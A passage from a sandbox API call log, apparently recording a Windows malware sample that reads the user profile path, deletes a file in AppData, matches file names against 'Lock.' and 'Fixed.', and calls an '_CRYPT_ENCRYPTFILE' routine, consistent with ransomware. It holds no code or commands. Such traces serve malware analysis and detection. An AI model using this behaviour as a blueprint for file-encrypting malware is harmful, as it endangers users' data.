dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0227.574] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0227.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0227.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0227.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0227.575] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0227.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0227.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0227.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0227.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0227.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0227.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0227.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0227.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0227.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0227.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0227.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0227.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0227.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0227.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0227.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0227.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0227.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e564e0 [0227.575] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Dm2KF.flv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Dm2KF.flv", lpFilePart=0x8cedf4*="Dm2KF.flv") returned 0x29 [0227.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0227.575] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Dm2KF.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dm2kf.flv")) returned 0x20 [0227.576] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Dm2KF.flv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a1a40, ftCreationTime.dwHighDateTime=0x1d5e384, ftLastAccessTime.dwLowDateTime=0xe8b26ce0, ftLastAccessTime.dwHighDateTime=0x1d5ec94, ftLastWriteTime.dwLowDateTime=0xe8b26ce0, ftLastWriteTime.dwHighDateTime=0x1d5ec94, nFileSizeHigh=0x0, nFileSizeLow=0x5116, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Dm2KF.flv", cAlternateFileName="")) returned 0xa870d0 [0227.576] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Dm2KF.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dm2kf.flv")) returned 1 [0227.639] FindNextFileW (in: hFindFile=0xa870d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a1a40, ftCreationTime.dwHighDateTime=0x1d5e384, ftLastAccessTime.dwLowDateTime=0xe8b26ce0, ftLastAccessTime.dwHighDateTime=0x1d5ec94, ftLastWriteTime.dwLowDateTime=0xe8b26ce0, ftLastWriteTime.dwHighDateTime=0x1d5ec94, nFileSizeHigh=0x0, nFileSizeLow=0x5116, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Dm2KF.flv", cAlternateFileName="")) returned 0 [0227.639] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0227.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0227.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0227.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0227.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0227.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0227.640] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0227.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0227.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0227.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0227.641] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0227.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0227.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0227.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0227.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0227.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0227.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0227.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0227.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0227.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0227.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0227.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0227.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0227.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0227.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0227.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0227.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0227.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0227.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0227.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0227.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e564e0 [0227.641] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Dm2KF.flv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Dm2KF.flv", lpFilePart=0x8cf650*="Dm2KF.flv") returned 0x29 [0227.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0227.642] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Dm2KF.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dm2kf.flv")) returned 0xffffffff [0227.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0227.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0227.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0227.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0227.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0227.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0227.642] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0227.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0227.643] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0227.643] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0227.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0227.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0227.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0227.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0227.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0227.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0227.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0227.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0227.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0227.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0227.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0227.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0227.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0227.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DS6Dq4b7eKkPU5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0227.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S6Dq4b7eKkPU5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0227.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Dq4b7eKkPU5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0227.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dq4b7eKkPU5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0227.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q4b7eKkPU5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0227.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4b7eKkPU5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0227.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b7eKkPU5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0227.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7eKkPU5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0227.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eKkPU5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0227.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KkPU5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0227.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kPU5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0227.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PU5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0227.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0227.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0227.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JH.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0227.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0227.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0227.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0227.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0227.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0227.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0227.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0227.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0227.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0227.644] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0227.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0227.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0227.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0227.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0227.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0227.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0227.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0227.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0227.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0227.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0227.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0227.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0227.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0227.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0227.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0227.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0227.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0227.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0227.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a) returned 0x2f04508 [0227.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DS6Dq4b7eKkPU5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S6Dq4b7eKkPU5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Dq4b7eKkPU5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dq4b7eKkPU5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q4b7eKkPU5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4b7eKkPU5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b7eKkPU5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7eKkPU5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eKkPU5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KkPU5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kPU5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PU5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0227.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JH.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0227.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0227.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0227.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0227.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0227.646] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0227.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0227.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0227.646] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0227.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0227.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0227.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0227.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0227.647] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0227.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0227.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0227.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0227.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0227.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0227.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0227.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0227.647] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0227.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0227.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0227.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0227.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 